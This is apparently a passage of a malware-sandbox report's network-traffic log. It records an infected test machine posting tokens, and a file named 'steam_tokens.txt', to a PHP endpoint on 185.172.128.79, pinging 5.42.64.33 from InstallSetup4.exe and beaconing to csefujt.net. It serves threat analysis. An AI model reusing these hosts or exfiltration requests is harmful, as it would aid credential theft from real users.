                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.365812063 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JDBKJJKEBGHIDGCBKJJD
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1759
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.698031902 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:14.754123926 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:15.092242956 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:14 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:15.106045008 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBAKEBAECGCBAAAAAEBA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:15.443389893 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:15.452524900 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CBAKJEHDBGHIEBGCGDGH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:15.784149885 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:15 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:15.796791077 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----FHCGCFHDHIIIDGCAAEGD
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:16.136023045 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:16.143661022 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:16.482316971 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:16.489732981 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----EBGDAAKJJDAAKFHJKJKF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:16.825265884 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:16 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:16.836154938 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----BGDBAKFCFHCGDGCBAAKF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:17.173213959 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:17 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:17.182748079 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----IJJJKEGHJKFHJKFHDHCF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:17.520910025 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:17 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:17.532546997 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KKFCFBKFCFBFIDGCGDHJ
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:17.869843006 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:17 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:17.885910034 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CGDGIJKFIJDAAAKFHIEG
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:18.217402935 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:18.309395075 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----DGHJEHJJDAAAKEBGCFCA
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:18.641331911 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:18 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:19.499639034 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----KEGCBFCBFBKFHIECAFCF
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:19.838248014 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:19 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:20.139950991 CET202OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCGCBAECFCAKKEBFCFII
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 1743
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:20.477508068 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:20 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:20.521250010 CET564OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----GCBGIIECGHCAKECAFBFH
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 363
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 5f 6e 61 6d 65 22 0d 0a 0d 0a 63 33 52 6c 59 57 31 66 64 47 39 72 5a 57 35 7a 4c 6e 52 34 64 41 3d 3d 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 66 69 6c 65 22 0d 0a 0d 0a 0d 0a 2d 2d 2d 2d 2d 2d 47 43 42 47 49 49 45 43 47 48 43 41 4b 45 43 41 46 42 46 48 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="file_name"c3RlYW1fdG9rZW5zLnR4dA==------GCBGIIECGHCAKECAFBFHContent-Disposition: form-data; name="file"------GCBGIIECGHCAKECAFBFH--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:20.856565952 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:20 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:20.939659119 CET204OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----CBFCBKKFBAEHJKEBKFCB
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 142507
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:21.660991907 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:21.740997076 CET471OUTPOST /3cd2b41cbde8fc9c.php HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Content-Type: multipart/form-data; boundary=----JEBGCBAFCGDAAKFIDGIE
                                                                                                                                                                                                                                                                                                                                                                Host: 185.172.128.79
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 270
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 74 6f 6b 65 6e 22 0d 0a 0d 0a 37 66 35 39 66 36 64 31 39 35 30 63 65 33 31 65 65 34 36 65 66 66 38 66 35 66 65 61 61 31 30 36 62 33 33 32 39 64 36 62 37 32 31 30 62 33 62 64 61 39 63 37 36 38 31 32 39 36 35 36 39 35 62 36 61 39 37 66 39 64 62 33 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6d 65 73 73 61 67 65 22 0d 0a 0d 0a 6a 62 64 74 61 69 6a 6f 76 67 0d 0a 2d 2d 2d 2d 2d 2d 4a 45 42 47 43 42 41 46 43 47 44 41 41 4b 46 49 44 47 49 45 2d 2d 0d 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: ------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="token"7f59f6d1950ce31ee46eff8f5feaa106b3329d6b7210b3bda9c76812965695b6a97f9db3------JEBGCBAFCGDAAKFIDGIEContent-Disposition: form-data; name="message"jbdtaijovg------JEBGCBAFCGDAAKFIDGIE--
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:22.070750952 CET170INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:21 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 0
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                                                                                                                                                                                7192.168.2.6497425.42.64.33804632C:\Users\user\AppData\Local\Temp\InstallSetup4.exe
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:27.433259964 CET139OUTGET /ping.php?substr=four HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                User-Agent: NSIS_Inetc (Mozilla)
                                                                                                                                                                                                                                                                                                                                                                Host: 5.42.64.33
                                                                                                                                                                                                                                                                                                                                                                Connection: Keep-Alive
                                                                                                                                                                                                                                                                                                                                                                Cache-Control: no-cache
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:27.651128054 CET419INHTTP/1.1 404 Not Found
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: Express
                                                                                                                                                                                                                                                                                                                                                                Content-Security-Policy: default-src 'none'
                                                                                                                                                                                                                                                                                                                                                                X-Content-Type-Options: nosniff
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=utf-8
                                                                                                                                                                                                                                                                                                                                                                Content-Length: 147
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:27 GMT
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                Keep-Alive: timeout=5
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0a 3c 68 65 61 64 3e 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0a 3c 74 69 74 6c 65 3e 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 0a 3c 70 72 65 3e 43 61 6e 6e 6f 74 20 47 45 54 20 2f 70 69 6e 67 2e 70 68 70 3c 2f 70 72 65 3e 0a 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a
                                                                                                                                                                                                                                                                                                                                                                Data Ascii: <!DOCTYPE html><html lang="en"><head><meta charset="utf-8"><title>Error</title></head><body><pre>Cannot GET /ping.php</pre></body></html>


                                                                                                                                                                                                                                                                                                                                                                Session IDSource IPSource PortDestination IPDestination Port
                                                                                                                                                                                                                                                                                                                                                                8192.168.2.649743185.196.8.2280
                                                                                                                                                                                                                                                                                                                                                                TimestampBytes transferredDirectionData
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:31.381170034 CET318OUTGET /search/?q=67e28dd83d5df2201606a51c7c27d78406abdd88be4b12ebb517aa5c96bd86ed82df14d714bca5817673aa4ce8889b5e4fa9281ae978fe71ea771795af8e05c646db22f31dfe339426fa11af66c156adb719a9577e55b8603e983a608ef810c3ee939b3c HTTP/1.1
                                                                                                                                                                                                                                                                                                                                                                Host: csefujt.net
                                                                                                                                                                                                                                                                                                                                                                User-Agent: Mozilla/5.0 (Windows; U; MSIE 9.0; Windows NT 9.0; en-US)
                                                                                                                                                                                                                                                                                                                                                                Feb 5, 2024 12:13:31.638701916 CET1286INHTTP/1.1 200 OK
                                                                                                                                                                                                                                                                                                                                                                Server: nginx/1.20.1
                                                                                                                                                                                                                                                                                                                                                                Date: Mon, 05 Feb 2024 11:13:31 GMT
                                                                                                                                                                                                                                                                                                                                                                Content-Type: text/html; charset=UTF-8
                                                                                                                                                                                                                                                                                                                                                                Transfer-Encoding: chunked
                                                                                                                                                                                                                                                                                                                                                                Connection: keep-alive
                                                                                                                                                                                                                                                                                                                                                                X-Powered-By: PHP/7.4.33
                                                                                                                                                                                                                                                                                                                                                                Data Raw: 39 38 30 0d 0a 36 37 62 36 38 61 38 61 33 32 30 33 61 37 37 62 30 34 31 38 66 35 35 66 36 37 37 35 38 63 64 38 34 36 66 66 38 64 63 65 66 35 31 64 31 66 65 39 62 64 35 36 65 62 30 61 63 32 61 38 63 65 61 39 63 63 65 38 30 65 63 37 31 35 39 37 62 64 64 33 33 34 32 31 66 36 30 39 62 61 38 63 61 62 34 30 36 30 65 34 37 65 35 64 62 33 37 37 66 37 36 30 62 37 33 30 35 36 64 65 66 63 64 32 30 65 63 61 34 30 63 64 37 64 62 62 31 39 66 61 32 64 38 39 32 34 66 61 31 36 61 30 37 38 63 32 35 31 62 31 65 30 34 65 65 64 35 31 37 61 35 64 65 64 32 63 36 66 38 62 33 61 36 36 38 37 65 31 31 33 63 34 65 38 39 66 39 66 33 62 63 64 36 34 39 66 31 33 63 36 35 32 38 65 32 64 61 38 35 66 62 61 66 37 35 65 32 32 65 34 37 31 64 31 66 64 37 39 62 32 38 36 65 62 63 62 34 62 65 35 33 65 64 37 31 37 33 36 35 64 34 34 32 32 65 33 32 66 37 31 30 38 36 36 62 32 65 61 38 38 65 30 38 37 32 64 35 38 66 38 35 64 37 61 32 30 65 30 32 65 35 63 66 64 66 66 65 37 38 63 66 31 33 38 37 65 62 61 65 63 34 37 39 62 39 61 66 61 37 62 32 36 30 64 62 65 36 30 65 35 39 64 63 62 62 32 36 65 64 34 37 35 30 63 33 36 33 33 36 37 62 32 35 35 63 66 64 62 61 37 33 61 32 65 62 61 63 32 30 38 62 64 31 65 62 38 61 32 33 62 61 36 63 64 63 66 32 65 37 36 32 65 30 63 64 39 33 35 65 62 31 33 65 35 64 38 62 62 31 39 34 64 64 33 33 38 30 64 63 32 35 34 63 35 66 31 36 31 39 62 32 37 62 34 39 36 35 65 61 39 65 33 64 34 61 63 64 65 33 63 32 35 61 30 37 39 62 38 65 62 31 34 39 39 61 34 62 39 37 39 35 39 61 30 38 37 66 66 32 30 61 34 66 62 39 62 38 34 31 66 65 63 30 61 65 33 35 64 38 35 35 32 36 64 63 61 62 30 63 62 66 65 64 38 34 61 36 63 61 34 39 38 66 30 33 62 61 61 36 61 38 38 30 61 33 36 62 35 32 33 64 33 33 61 64 37 39 64 30 30 63 62 35 64 62 65 33 30 30 32 31 34 34 66 63 62 64 36 36 37 34 32 33 61 35 34 36 35 39 62 66 62 38 34 32 39 32 63 36 30 34 34 31 38 63 37 64 63 62 33 31 31 31 62 65 33 64 30 62 39 66 37 64 35 33 31 37 35 37 38 65 37 33 66 38 65 63 62 30 34 31 35 34 31 39 66 61 62 64 61 30 35 34 62 35 61 64 35 37 65 37 66 35 39 33 33 34 65 65 38 64 34 63 63 63 62 66 39 64 34 35 34 39 66 32 32 36 61 34 38 66 34 37 65 33 34 38 32 32 38 62 64 63 65 39 35 37 64 39 34 35 35 63 39 39 32 32 32 31 65 30 63 37 66 39 63 66 34 39 65 65 30 31 39 30 66 61 36 32 34 38 33 64 64 30 63 37 32 30 34 64 34 32 39 63 65 66 34 39 38 31 36 37 32 33 63 37 62 39 63 33 35 30 32 65 36 35 35 34 33 36 30 36 35 38 37 34 61 63 34 62 65 61 36 66 39 33 31 61 30 64 62 63 31 31 30 35 32 38 36 32 62 63 64 35 63 35 37 38 64 62 62 63 39 36 34 64 33 35 30 32 35 62 33 36 61 65 38 32 65 32 36 62 33 36 66 38 37 35 64 30 33 63 65 61 37 61 32 62 30 36 65 61 65 63 32 31 32 39 33 34 65 64 33 64 34 63 61 34 62 61 64 31 30 62 63 34 62 66 63 62 33 62 31 36 35 39 65 62 30 32 63 61 62 32 36 32 62 30 65 33 33 63 37 38 39 37 39 31 39 65 39 61 31 63 30 34 63 37 62 65 62 33 30 33 62 32 64 30 61 31 65 64 36 33 30 61 62 34 65 